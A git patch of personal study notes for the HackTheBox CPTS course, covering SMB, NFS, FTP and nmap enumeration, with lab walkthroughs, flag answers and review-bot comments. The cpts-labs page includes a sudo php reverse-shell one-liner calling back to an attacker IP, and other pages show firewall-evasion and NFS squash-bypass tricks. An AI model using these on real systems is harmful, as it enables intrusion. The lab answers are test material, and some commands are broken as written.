From 3a9ac4089631fee79a6e169c4b0ed15d650a290a Mon Sep 17 00:00:00 2001 From: amandaguglieri Date: Tue, 11 Jun 2024 16:27:57 -0400 Subject: [PATCH] feat: notes on CPTS --- docs/137-138-139-445-smb.md | 9 + docs/2049-nfs-network-file-system.md | 4 +- docs/21-ftp.md | 69 ++++-- docs/cpts-labs.md | 300 +++++++++++++++++++++++++++ docs/gobuster.md | 9 +- docs/htb-bank.md | 2 +- docs/information-gathering.md | 18 +- docs/nmap.md | 37 ++-- docs/samba-suite.md | 2 + 9 files changed, 413 insertions(+), 37 deletions(-) diff --git a/docs/137-138-139-445-smb.md b/docs/137-138-139-445-smb.md index acc13fd8ad..d3679b0f73 100644 --- a/docs/137-138-139-445-smb.md +++ b/docs/137-138-139-445-smb.md @@ -95,6 +95,15 @@ We will try to connect to each of the shares except for the IPC$ one, which is n ```bash # the use of / and \ might be different if you need to escape some characters smbclient \\\\$ip\\ADMIN$ + +# download file.txt +get file.txt + +# List files +!ls + +# Cat a file.txt +!cat file.txt ``` ### 2. smb2 security levels diff --git a/docs/2049-nfs-network-file-system.md b/docs/2049-nfs-network-file-system.md index 7bfaf6d263..24138d4209 100644 --- a/docs/2049-nfs-network-file-system.md +++ b/docs/2049-nfs-network-file-system.md 
@@ -13,7 +13,7 @@ tags: # Port 2049 - NFS Network File System -Network File System (NFS) is a network file system developed by Sun Microsystems and has the same purpose as SMB. Its purpose is to access file systems +over a network as if they were local. However, it uses an entirely different protocol. [NFS](https://en.wikipedia.org/wiki/Network_File_System) is used between Linux and Unix systems. This means that NFS clients cannot communicate directly with SMB servers. +Network File System (NFS) is a network file system developed by Sun Microsystems and has the same purpose as SMB. Its purpose is to access file systems over a network as if they were local. However, it uses an entirely different protocol. [NFS](https://en.wikipedia.org/wiki/Network_File_System) is used between Linux and Unix systems. This means that NFS clients cannot communicate directly with SMB servers. NFS is an Internet standard that governs the procedures in a distributed file system. While NFS protocol version 3.0 (`NFSv3`), which has been in use for many years, authenticates the client computer, this changes with `NFSv4`. Here, as with the Windows SMB protocol, the user must authenticate. @@ -92,7 +92,7 @@ ls -n mnt/nfs/ sudo umount ./target-NFS ``` -By default nfs server has root_squash on which makes client access nobody:nogroup. To bypass it, sudo su your user to be root. +By default nfs server has root_squash option on, which makes client access nobody:nogroup. To bypass it, sudo su your user to be root. ## Attacking wrong configured NFS diff --git a/docs/21-ftp.md b/docs/21-ftp.md index 32d8df2482..1a81e0b96b 100644 --- a/docs/21-ftp.md +++ b/docs/21-ftp.md 
@@ -48,6 +48,7 @@ ftp $ip The prompt will ask us for the username we want to log in with. Here is where the magic happens. A typical misconfiguration for running FTP services allows an anonymous account to access the service like any other authenticated user. The anonymous username can be input when the prompt appears, followed by any password whatsoever since the service will disregard the password for this specific account. + ## Basic usage ``` @@ -98,14 +99,33 @@ wget -m --no-passive ftp://anonymous:anonymous@$ip find / -type f -name ftp* 2>/dev/null | grep scripts # Run a general scanner for version, mode aggresive and perform default scripts -sudo nmap -sV -p21 -sC -A $ip +sudo nmap -sV -p21 -sC -A $ip --script-trace +# --script-trace > trace the progress of NSE scripts at the network level +# -sV > version scan +# -A > aggressive scan +# -sC > the default script scan +``` + +Some nmap scripts related to ftp: + +``` # ftp-anon NSE script checks whether the FTP server allows anonymous access. # ftp-syst, for example, executes the `STAT` command, which displays information about the FTP server status. + + ``` [See more about nmap for scanning, running scripts and footprinting](nmap.md) +## Interact with the service + +``` +nc -nv $ip 21 +telnet $ip 21 +openssl s_client -connect $ip:21 -starttls ftp +``` + ## Attacking FTP ### Brute forcing with Medusa 
@@ -206,22 +226,39 @@ sudo apt install vsftpd The default configuration of vsFTPd can be found in `/etc/vsftpd.conf`. +``` +cat /etc/vsftpd.conf | grep -v "#" +``` -|**Setting**|**Description**| -|---|---| -|`listen=NO`|Run from inetd or as a standalone daemon?| -|`listen_ipv6=YES`|Listen on IPv6 ?| -|`anonymous_enable=NO`|Enable Anonymous access?| -|`local_enable=YES`|Allow local users to login?| -|`dirmessage_enable=YES`|Display active directory messages when users go into certain directories?| -|`use_localtime=YES`|Use local time?| -|`xferlog_enable=YES`|Activate logging of uploads/downloads?| -|`connect_from_port_20=YES`|Connect from port 20?| -|`secure_chroot_dir=/var/run/vsftpd/empty`|Name of an empty directory| -|`pam_service_name=vsftpd`|This string is the name of the PAM service vsftpd will use.| -|`rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem`|The last three options specify the location of the RSA certificate to use for SSL encrypted connections.| -|`rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key`|| -|`ssl_enable=NO`|| +| **Setting** | **Description** | +| ------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------- | +| `listen=NO` | Run from inetd or as a standalone daemon? | +| `listen_ipv6=YES` | Listen on IPv6 ? | +| `anonymous_enable=NO` | Enable Anonymous access? | +| `local_enable=YES` | Allow local users to login? | +| `dirmessage_enable=YES` | Display active directory messages when users go into certain directories? | +| `use_localtime=YES` | Use local time? | +| `xferlog_enable=YES` | Activate logging of uploads/downloads? | +| `connect_from_port_20=YES` | Connect from port 20? | +| `secure_chroot_dir=/var/run/vsftpd/empty` | Name of an empty directory | +| `pam_service_name=vsftpd` | This string is the name of the PAM service vsftpd will use. 
| +| `rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem` | The last three options specify the location of the RSA certificate to use for SSL encrypted connections. | +| `rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key` | | +| `ssl_enable=NO` | | In addition, there is a file called `/etc/ftpusers` that we also need to pay attention to, as this file is used to deny certain users access to the FTP service. +``` +cat /etc/ftpusers +``` + +Dangerous settings: + +| **Setting** | **Description** | +| ------------------------------ | ---------------------------------------------------------------------------------- | +| `anonymous_enable=YES` | Allowing anonymous login? | +| `anon_upload_enable=YES` | Allowing anonymous to upload files? | +| `anon_mkdir_write_enable=YES` | Allowing anonymous to create new directories? | +| `no_anon_password=YES` | Do not ask anonymous for password? | +| `anon_root=/home/username/ftp` | Directory for anonymous. | +| `write_enable=YES` | Allow the usage of FTP commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE? | \ No newline at end of file diff --git a/docs/cpts-labs.md b/docs/cpts-labs.md index 2b8b1f2c59..23c65e8ed9 100644 --- a/docs/cpts-labs.md +++ b/docs/cpts-labs.md 
@@ -340,4 +340,304 @@ cat /home/mrb3n/user.txt **After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag.** +Check out our permissions +``` +sudo -l +``` + +Results: + +``` +Matching Defaults entries for www-data on gettingstarted: + env_reset, mail_badpass, + secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin + +User www-data may run the following commands on gettingstarted: + (ALL : ALL) NOPASSWD: /usr/bin/php + +``` + +Grab a simple php reverse shell such as: + +``` +php -r '$sock=fsockopen("$AttackerIP",4444);exec("/bin/sh <&3 >&3 2>&3");' +``` + +Set up a netcat listener on port 4444: + +``` +nc -lnvp +``` + + +Run as sudo: + +``` +sudo /usr/bin/php -r '$sock=fsockopen("$AttackerIP",4444);exec("/bin/sh <&3 >&3 2>&3"); +``` + +You are root in the listener. Now + +``` +cat /root/root.txt +``` + +**Results**: f1fba6e9f71efb2630e6e34da6387842 + + + +## NETWORK ENUMERATION WITH NMAP + +### Host Enumeration + +#### [Host Discovery](https://academy.hackthebox.com/module/19/section/101) + +**Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result.** + + +``` +sudo nmap $ip -sn -oA host -PE --packet-trace --disable-arp-ping +``` + +**Result**: Windows + +#### [Host and Port Scanning](https://academy.hackthebox.com/module/19/section/102) + + +**Find all TCP ports on your target. Submit the total number of found TCP ports as the answer.** + +``` +nmap $ip +``` + +**Results**: 7 + + +**Enumerate the hostname of your target and submit it as the answer. (case-sensitive):** + +``` +sudo nmap $ip -Pn -sC -sV -p22,80,110,139,143,445,31337 +``` + +**Results**: nix-nmap-default + + +#### [Saving the Results](https://academy.hackthebox.com/module/19/section/104) + + Perform a full TCP port scan on your target and create an HTML report. Submit the number of the highest port as the answer. 
+ +``` +nmap $ip +``` + +Results: 31337 + + +#### [Service Enumeration](https://academy.hackthebox.com/module/19/section/103) + +Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer. + +``` +sudo nmap $ip -Pn -sC -sV -p22,80,110,139,143,445,31337 +``` + +Results: HTB{pr0F7pDv3r510nb4nn3r} + + +#### [Nmap Scripting Engine](https://academy.hackthebox.com/module/19/section/108) + +**Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer.** + +``` +sudo nmap $ip -p80 --script vuln +``` + +Result: + +``` +Pre-scan script results: +| broadcast-avahi-dos: +| Discovered hosts: +| 224.0.0.251 +| After NULL UDP avahi packet DoS (CVE-2011-1002). +|_ Hosts are all up (not vulnerable). +Nmap scan report for 10.129.68.164 +Host is up (0.047s latency). + +PORT STATE SERVICE +80/tcp open http +|_http-csrf: Couldn't find any CSRF vulnerabilities. +|_http-dombased-xss: Couldn't find any DOM based XSS. +|_http-stored-xss: Couldn't find any stored XSS vulnerabilities. +| http-enum: +|_ /robots.txt: Robots file +``` + +Go to robots.txt and get the flag. + +Results: HTB{873nniuc71bu6usbs1i96as6dsv26} + + +### Bypass Security Measures + + +#### [Firewall and IDS/IPS Evasion - Easy Lab](https://academy.hackthebox.com/module/19/section/117) + +Our client wants to know if we can identify which operating system their provided machine is running on. Submit the OS name as the answer. + +``` +sudo nmap -sC -sV $ip -p80 -Pn --max-retries 3 --initial-rtt-timeout 50ms --max-rtt-timeout 100ms +``` + +Results: Ubuntu + + + +#### [Firewall and IDS/IPS Evasion - Medium Lab](https://academy.hackthebox.com/module/19/section/118) + +After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer. 
+ +``` +sudo nmap -sU -p53 --script dns-nsid $ip +``` + +Results: HTB{GoTtgUnyze9Psw4vGjcuMpHRp} + + +#### [Firewall and IDS/IPS Evasion - Hard Lab](https://academy.hackthebox.com/module/19/section/119) + + Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer. + +``` +sudo nc -nv -p 53 $ip 50000 +``` + + +Results: HTB{kjnsdf2n982n1827eh76238s98di1w6} + + + +## NETWORK ENUMERATION WITH NMAP + +### FTP + +Which version of the FTP server is running on the target system? Submit the entire banner as the answer. + +``` +nc -nv $ip 21 +``` + +Results: InFreight FTP v1.1 + + +Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer. + +``` +ftp $ip +``` + +Enter user anonymous. + +Enter password anonymous. + +``` +ftp> dir +ftp> get flag.txt +ftp> quit + +cat flag. +``` + +Results: HTB{b7skjr4c76zhsds7fzhd4k3ujg7nhdjre} + + +### SMB + +What version of the SMB server is running on the target system? Submit the entire banner as the answer. + +``` +sudo nmap $ip -p445 -sV -A -sC +``` + +Results: Samba smbd 4.6.2 + + + What is the name of the accessible share on the target? + +``` + smbclient -L //$ip +``` + +Results: sambashare + + +Connect to the discovered share and find the flag.txt file. Submit the contents as the answer. + +``` +smbclient //$ip/sambashare -U "" +dir +cd contents +ls +get flag.txt +quit +cat flag.txt +``` + +Results: HTB{o873nz4xdo873n4zo873zn4fksuhldsf} + + +Find out which domain the server belongs to. + +``` +rpcclient -U "" $ip +rpcclient $> querydominfo +``` + +Results: DEVOPS + +Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer. + +``` +rpcclient $> netsharegetinfo sambashare +``` + +Results: InFreight SMB v3.1 + + + +What is the full system path of that specific share? 
(format: "/directory/names") + +``` +rpcclient $> netsharegetinfo sambashare +``` + +Results: /home/sambauser + + +### NFS + + +Enumerate the NFS service and submit the contents of the flag.txt in the "nfs" share as the answer. + +``` +sudo nmap $ip -p111,2049 -sV -sC +showmount -e $ip +mkdir target +sudo mount -t nfs $ip:/ ./target -o nolock +cd target +tree . +cat var/nfs/flag.txt +``` + +Results: HTB{hjglmvtkjhlkfuhgi734zthrie7rjmdze} + + + +Enumerate the NFS service and submit the contents of the flag.txt in the "nfsshare" share as the answer. + +``` +cat mnt/nfsshare/flag.txt +``` + +Results: HTB{8o7435zhtuih7fztdrzuhdhkfjcn7ghi4357ndcthzuc7rtfghu34} diff --git a/docs/gobuster.md b/docs/gobuster.md index 464f702c7c..c86f959bcf 100644 --- a/docs/gobuster.md +++ b/docs/gobuster.md @@ -7,7 +7,14 @@ TableOfContents: true # gobuster -Great tool to brute force directory discovery but it's not recursive (you need to specify a directory to perform a deeper scanner). Also, dictionaries are not API-specific. But here are some commands for Gobuster: +Great tool to brute force directory discovery but it's not recursive (you need to specify a directory to perform a deeper scanner). + +## Installation + +Repository: [https://github.com/OJ/gobuster](https://github.com/OJ/gobuster) + +Also, dictionaries are not API-specific. But here are some commands for Gobuster: + ```bash gobuster dir -u -w -b 403,4.4 -x .php,.txt -r diff --git a/docs/htb-bank.md b/docs/htb-bank.md index 48b0c9fec6..a3b3511bd2 100644 --- a/docs/htb-bank.md +++ b/docs/htb-bank.md 
@@ -185,7 +185,7 @@ And results: `/var/htb/bin/emergency` catches our attention inmediately. Doing a strings on it we can see that it contains a "/bin/bash" command. After resolving this machine, I read [this writeup](https://0xdf.gitlab.io/2020/07/07/htb-bank.html#emergency) and got some insights about how to investigate an elf file beyond doing some strings. In this writeup, a md5sum is done and googling the hash returned that this elf file is in reality a dash shell. -Nice. Run the binary and you are root. +Nice. Run the binary and you are root. If you have spawned the shell you may run into problems. Better do it without spawning it. ```bash ./var/htb/bin/emergency diff --git a/docs/information-gathering.md b/docs/information-gathering.md index a11b2c9a48..b22e1056c2 100644 --- a/docs/information-gathering.md +++ b/docs/information-gathering.md @@ -119,7 +119,7 @@ A valuable resource for this information is the Domain Name System (DNS). We can > Some if these tools can also be used in Active DNS enumerations. -Worth trying: [DNSRecon](dnsrecon.md). +Worth trying: [DNSRecon](dnsrecon.md) and https://domain.glass/ | Tool + Cheat sheet | What it does | | ------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | 
@@ -128,6 +128,7 @@ Worth trying: [DNSRecon](dnsrecon.md). | [dnscan](dnscan.md) | Python wordlist-based DNS subdomain scanner. | | [DNSRecon](dnsrecon.md) | Preinstalled with Linux: dsnrecon is a simple python script that enables to gather DNS-oriented information on a given target. | | [dnsdumpster.com](https://dnsdumpster.com/) | DNSdumpster.com is a FREE domain research tool that can discover hosts related to a domain. Finding visible hosts from the attackers perspective is an important part of the security assessment process. | +| https://domain.glass/ | | ### 1.3. Reviewing server metafiles @@ -160,8 +161,15 @@ Some of these files: |:---|:---|:---|:---| |1.1|[WSTG-INFO-01](OWASP/WSTG-INFO-01.md) |[Conduct Search Engine Discovery Reconnaissance for Information Leakage](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage)|- Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).| +### 1.5. Cloud resources -### 1.5. Fingerprint web application technology and frameworks +Buckets, blob, ...: https://buckets.grayhatwarfare.com/ + +https://domain.glass/ + + + +### 1.6. Fingerprint web application technology and frameworks !!! quote "" [OWASP Web Security Testing Guide 4.2](OWASP/index.md) > 1. Information Gathering > 1.8. Fingerprint Web Application Framework @@ -255,7 +263,7 @@ sudo nmap -v $ip --script banner.nse -### 1.6. WAF detection +### 1.7. WAF detection #### wafw00f 
@@ -277,7 +285,7 @@ wafw00f -v https://www.example.com nmap -p443 --script http-waf-detect ``` -### 1.7. Code analysis: HTTRack and EyeWitness +### 1.8. Code analysis: HTTRack and EyeWitness !!! quote "" [OWASP Web Security Testing Guide 4.2](OWASP/index.md) > 1. Information Gathering > 1.7. Map Execution Paths through applications @@ -324,7 +332,7 @@ After that you will get a report.html file with the request and a screenshot of eyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080 ``` -### 1.8. Passive crawling with Burp Suite +### 1.9. Passive crawling with Burp Suite **Crawling** is the process of navigating around the web application, following links, submitting forms and logging in (where possible) with the objective of mapping out and cataloging the web application and the navigational paths within it. diff --git a/docs/nmap.md b/docs/nmap.md index 37a44af2d0..e037c4d6e2 100644 --- a/docs/nmap.md +++ b/docs/nmap.md @@ -9,9 +9,15 @@ tags: - active recon - passiverecon --- - # nmap - A network exploration and security auditing tool + +??? abstract "Sources of this notes" + - [HackTheBox Academy: Network enumeration with nmap](https://academy.hackthebox.com/module/details/19) + - nmap documentation. + + + ## Description Network Mapper is an open source tool for network exploration and security auditing. Free and open-source scanner created by Gordon Lyon. Nmap is used to discover hosts and services on a computer network by sending packages and analyzing the responses. Another discovery feature is that of operating system detection. These features are extensible by scripts that provide more advanced service detection. @@ -174,8 +180,11 @@ nmap $ip -sC # Run scripts from a category. See categories below nmap $ip --script -# Run specific scripts +# Run defined scripts nmap --script ,, -p $ip + +# Run custom scripts: +# Save them in /usr/share/nmaps/script ``` 
@@ -299,14 +308,14 @@ sudo nmap $ip/24 -F --min-rate 300 Nmap offers six different timing templates (`-T <0-5>`), being defaul one, -T 3. -| Flag | Mode| -| ---- | ------ | -| -T 0 | Paranoid | -| -T 1 | Sneaky | -| -T 2 | Polite | -| -T 3 | Normal | +| Flag | Mode | +| ---- | ---------- | +| -T 0 | Paranoid | +| -T 1 | Sneaky | +| -T 2 | Polite | +| -T 3 | Normal | | -T 4 | Aggressive | -| -T 5 | Insane | +| -T 5 | Insane | More on [nmap documentation](https://nmap.org/book/performance-timing-templates.html). @@ -372,7 +381,7 @@ sudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace # SYN-Scan From DNS Port -sudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53 + # PORT STATE SERVICE # 50000/tcp open ibm-db2 ``` @@ -380,7 +389,7 @@ sudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port Following the example, a possible exploitation for this weak configuration would be: ```shell-session -nc -nv -p 53 $ip 50000 + ``` 
@@ -450,6 +459,10 @@ List of the most filtered ports: 80, 25, 22, 443, 21, 113, 23, 53, 554, 3389, 1 By default, `Nmap` scans the top 1000 TCP ports with the SYN scan (`-sS`). This SYN scan is set only to default when we run it as root because of the socket permissions required to create raw TCP packets. Therefore, by default, Nmap performs a SYN Scan, though it substitutes a connect scan if the user does not have proper privileges to send raw packets (requires root access on Unix). Unprivileged users can only execute connect and FTP bounce scans. +- If our target sends an `SYN-ACK` flagged packet back to the scanned port, Nmap detects that the port is `open`. +- If the packet receives an `RST` flag, it is an indicator that the port is `closed`. +- If Nmap does not receive a packet back, it will display it as `filtered`. Depending on the firewall configuration, certain packets may be dropped or ignored by the firewall. + ![TCP SYN scan](img/nmap_ss.jpeg) - No connection established, but we got our response. @@ -542,7 +555,7 @@ xsltproc target.xml -o target.html It can be done with `-packet-trace` or with `--reason`. ```shell-session -sudo nmap -sn -oA host -PE --packet-trace +sudo nmap -sn -oA host o # -sn Disables port scanning. # -oA host Stores the results in all formats starting with the name 'host'. # -PE Performs the ping scan by using 'ICMP Echo requests' against the target. diff --git a/docs/samba-suite.md b/docs/samba-suite.md index 28ea9bd5c2..78881610d4 100644 --- a/docs/samba-suite.md +++ b/docs/samba-suite.md @@ -51,4 +51,6 @@ Be careful, sometimes the shell removes the slashes and you need to escape them. - from smb command line: ```smb get flag_1.txt + !ls + !cat flag.txt ```
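Review bot: in the docs/137-138-139-445-smb.md hunk (@@ -95,6) the three added commands `get file.txt`, `!ls` and `!cat file.txt` are typed at the `smb: \>` prompt, not in bash, yet the fence is tagged `bash` and opens with the `smbclient \\\\$ip\\ADMIN$` invocation, so mark where the prompt changes. Also `!` hands the rest of the line to the local shell: `!ls` lists the attacker's working directory, not the share, and `!cat file.txt` only succeeds after `get file.txt` has pulled the file down. The comment `# List files` should say local files; a remote listing is `ls` or `dir` without the `!`.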
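Review bot: in docs/2049-nfs-network-file-system.md (@@ -92,7) the reworded sentence `By default nfs server has root_squash option on, which makes client access nobody:nogroup. To bypass it, sudo su your user to be root.` contradicts itself: root_squash is precisely the option that maps the client's UID 0 to nobody:nogroup, so becoming root on the client does not bypass it. Being root only helps when the export is configured with `no_root_squash`; with root_squash in effect the usual move is to create a local user whose UID matches the owner shown by the `ls -n mnt/nfs/` line already in the surrounding context. Suggest rewording to say which case is which.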
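Review bot: in docs/21-ftp.md (@@ -98,14) the new `Some nmap scripts related to ftp:` block contains only two comment lines and two trailing blank lines, with no command that actually runs the scripts; add the invocation, for example `sudo nmap -p21 --script ftp-anon,ftp-syst $ip`, and drop the blank lines before the closing fence. In the command above it, `-A` already turns on `-sV` and `-sC` (plus OS detection and traceroute), so the added comment block could say that instead of listing them as independent flags, and `aggresive` in the retained comment is misspelled.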
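Review bot: in docs/21-ftp.md (@@ -206,22) `cat /etc/vsftpd.conf | grep -v "#"` drops every line that contains a `#` anywhere, not only comment lines, and keeps blank lines; `grep -vE '^\s*(#|$)' /etc/vsftpd.conf` shows just the active directives and needs no `cat`. The hunk also leaves the file without a trailing newline after the Dangerous settings table (`\ No newline at end of file`); add one.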
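Review bot: in docs/cpts-labs.md (@@ -340,4) the privilege-escalation steps do not run as written: `nc -lnvp` is missing its port (`nc -lnvp 4444`), and the line `sudo /usr/bin/php -r '$sock=fsockopen("$AttackerIP",4444);exec("/bin/sh <&3 >&3 2>&3");` lacks the closing `'` that the unprivileged version two blocks above has. In both one-liners `$AttackerIP` sits inside single quotes and so reaches PHP as a PHP variable, which is undefined and expands to an empty string; write the attacker IP literally or break out of the single quotes around it. Further down, `cat flag.` in the FTP walkthrough is truncated (`cat flag.txt`), the second `## NETWORK ENUMERATION WITH NMAP` heading duplicates the first while actually introducing the FTP/SMB/NFS footprinting tasks, and under `Saving the Results` the task asks for a full TCP port scan with an HTML report but the command shown is just `nmap $ip`, which covers only the top 1000 ports and writes no report (`-p-` with `-oX`, then `xsltproc`, which docs/nmap.md already documents).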
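Review bot: in docs/gobuster.md (@@ -7,7) the sentence `Also, dictionaries are not API-specific. But here are some commands for Gobuster:` has been moved below the new `## Installation` heading, where it now reads as part of the installation instructions and is separated from the sentence it continues (`Great tool ... deeper scanner).`). Keep it with the intro paragraph or give the command block its own `## Usage` heading. While here, `-b 403,4.4` in the first example command looks like a typo for `-b 403,404`.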
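Review bot: in docs/htb-bank.md (@@ -185,7) the added `If you have spawned the shell you may run into problems. Better do it without spawning it.` is too vague to act on: say which shell is meant (the upgraded TTY shell versus the raw reverse shell) and what the problem is, otherwise the reader cannot tell what to avoid before running `./var/htb/bin/emergency`.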
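Review bot: in docs/information-gathering.md (@@ -128,6) the new table row `| https://domain.glass/ | |` has an empty `What it does` cell, unlike every other row, and the same URL is also appended to the `Worth trying:` line (@@ -119,7) and to the new `### 1.5. Cloud resources` section (@@ -160,8), so it is linked three times without ever being described. Add a one-line description in the table and drop the duplicates; in the Cloud resources section it sits next to buckets.grayhatwarfare.com with no explanation of what it finds there, and that section otherwise consists of two bare URLs and a `Buckets, blob, ...:` fragment.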
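Review bot: in docs/nmap.md (@@ -9,9) the hunk deletes the page's H1 `# nmap - A network exploration and security auditing tool` and inserts the `??? abstract "Sources of this notes"` admonition in its place without restoring a title, so the page now starts with the admonition and then `## Description`. Re-add the H1 above the admonition (the other pages in this patch keep theirs, e.g. `# Port 2049 - NFS Network File System`), and `Sources of this notes` should read `Sources of these notes`.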
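Review bot: in docs/nmap.md (@@ -174,8) `# Save them in /usr/share/nmaps/script` names a path that does not exist; NSE scripts live in `/usr/share/nmap/scripts` on Debian-based installs (the directory is `nmap`, the plural is on `scripts`), and after copying a custom script there it has to be registered with `sudo nmap --script-updatedb` before `--script <name>` resolves it. A script can also be run directly by path with `--script /path/to/script.nse` without touching the system directory at all.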
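Review bot: in docs/nmap.md (@@ -372,7) the command `sudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53` is removed but its heading comment `# SYN-Scan From DNS Port` and the expected output `# 50000/tcp open ibm-db2` stay, so the example now shows a result with nothing producing it, and the sentence after the block (`Following the example, a possible exploitation for this weak configuration would be:`) refers to it. If the intent was to copy it into docs/cpts-labs.md, keep it here too.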
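Review bot: in docs/nmap.md (@@ -380,7) `nc -nv -p 53 $ip 50000` is deleted, leaving an empty `shell-session` fence directly under `a possible exploitation for this weak configuration would be:`. Restore the line; the identical command now appears in docs/cpts-labs.md under the Hard Lab, so this reads like an accidental cut rather than a deliberate removal.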
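Review bot: in docs/nmap.md (@@ -450,6) `an `SYN-ACK` flagged packet` should read `a SYN-ACK`. The third bullet (`If Nmap does not receive a packet back, it will display it as filtered`) could also note that an ICMP unreachable error in reply produces the same `filtered` verdict, which is the rejecting-firewall case the bullet's own `dropped or ignored by the firewall` sentence alludes to.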
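Review bot: in docs/nmap.md (@@ -542,7) `sudo nmap -sn -oA host -PE --packet-trace` has been replaced with `sudo nmap -sn -oA host o`, which drops `-PE` and `--packet-trace` and adds a stray `o`, while the comment lines that follow still explain `-PE` and the sentence above says the check is done with `-packet-trace` or `--reason`. This looks like an accidental keystroke; restore the original line (with `$ip` as the target, as the rest of the page does), and `-packet-trace` in that sentence should be `--packet-trace`.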
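Review bot: in docs/samba-suite.md (@@ -51,4) the added `!ls` and `!cat flag.txt` run on the local machine (`!` escapes to the local shell from the smbclient prompt), so `!cat flag.txt` only works once a `get` has downloaded that file, and the `get` on the line above fetches `flag_1.txt`, not `flag.txt`. Make the names agree (`get flag_1.txt` then `!cat flag_1.txt`) and say in a comment that `!` commands act locally.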